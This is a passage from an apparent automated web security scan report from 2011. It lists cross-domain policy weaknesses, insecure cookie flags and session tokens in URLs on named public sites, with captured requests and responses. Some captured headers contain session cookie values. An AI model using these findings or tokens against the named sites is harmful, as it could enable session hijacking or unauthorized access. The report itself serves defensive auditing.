Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 00:55:45 GMT
Expires: Sun, 04 Sep 2011 00:55:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.64. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:16:53 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.65. http://sales.reuters.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sales.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 05 Oct 2009 20:10:04 GMT
ETag: "176c414-1aa-47535b304df00"
Accept-Ranges: bytes
Content-Length: 426
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="sales.reuters.com" />
   <allow-access-from domain="in.sales.reuters.com" />
   <allow-access-from domain="cn.sales.reuters.com" />
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.2. http://content.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

7.3. http://metrics.sprint.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://nmsacramento.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www597
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

7.6. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:00:20 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 3106
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:36 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:36 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.8. http://usatoday1.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www46
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://wa.proflowers.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www381
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

9. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

10. SSL certificate  previous  next
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



10.1. https://sprintlb.ehosts.net/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://sprintlb.ehosts.net
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.ehosts.net
Issued by:  DigiCert High Assurance CA-3
Valid from:  Fri Nov 19 18:00:00 GMT-06:00 2010
Valid to:  Tue Jan 22 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

10.2. https://socialize.gigya.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.gigya.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Nov 04 09:50:30 GMT-06:00 2010
Valid to:  Sun Nov 04 09:50:30 GMT-06:00 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Thu Jun 29 11:06:20 GMT-06:00 2034

10.3. https://www.linkedin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.linkedin.com
Issued by:  Thawte SGC CA - G2
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SGC CA - G2
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Wed Jul 28 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 28 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

10.4. https://www.sprint.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.sprint.net
Issued by:  Entrust Certification Authority - L1B
Valid from:  Mon May 18 12:20:39 GMT-06:00 2009
Valid to:  Tue Jun 05 12:50:38 GMT-06:00 2012

Certificate chain #1

Issued to:  Entrust Certification Authority - L1B
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Mon Aug 25 12:14:26 GMT-06:00 2008
Valid to:  Sat Aug 25 12:44:26 GMT-06:00 2018

Certificate chain #2

Issued to:  Entrust.net Certification Authority (2048)
Issued by:  Entrust.net Certification Authority (2048)
Valid from:  Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:  Tue Jul 24 08:15:12 GMT-06:00 2029

11. Cookie scoped to parent domain  previous  next
There are 72 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/UND_com/lists/notre-dame-football/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/UND_com/lists/notre-dame-football/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=110147983668019200&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1315097070986=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315097213-36482-17537
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 00:46:53 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.03541
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9d4c870c9296f3cdf37ddb0b78039db1ef7aa6d3
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

11.2. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=TheStateWorker&callback=jQuery15205311797398608178_1315097321811&_=1315097336786 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=ZLhHHTiegr9ZeZnOIT1ohtdIIAUTURrnM90Zk22E58AH781tT8Sqfmggoy3GJ6qCFp%2FomPpBiK90FUtvMdSL%2BA%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTcy%250ANjg1MmRkYWE1MzRlMmE4OGU2OTFjYTBiYWVlOWQ1--e78b59f956406f6acf8bd93189b1699ee1b15969

Response

HTTP/1.1 400 Bad Request
Date: Sun, 04 Sep 2011 01:02:55 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00676
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1315100623
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJ4T5DEyAToHaWQiJTcyNjg1MmRkYWE1MzRl%250AMmE4OGU2OTFjYTBiYWVlOWQ1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--80ecc5b310403c83226424780f816ab1a5936422; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 01:07:55 GMT
Vary: Accept-Encoding
Content-Length: 267
Connection: close

jQuery15205311797398608178_1315097321811({"error":"Rate limit exceeded. Clients may not make more than 150 requests per hour.","request":"\/1\/statuses\/user_timeline.json?screen_name=TheStateWorker&c
...[SNIP]...

11.3. http://www.personalcreations.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
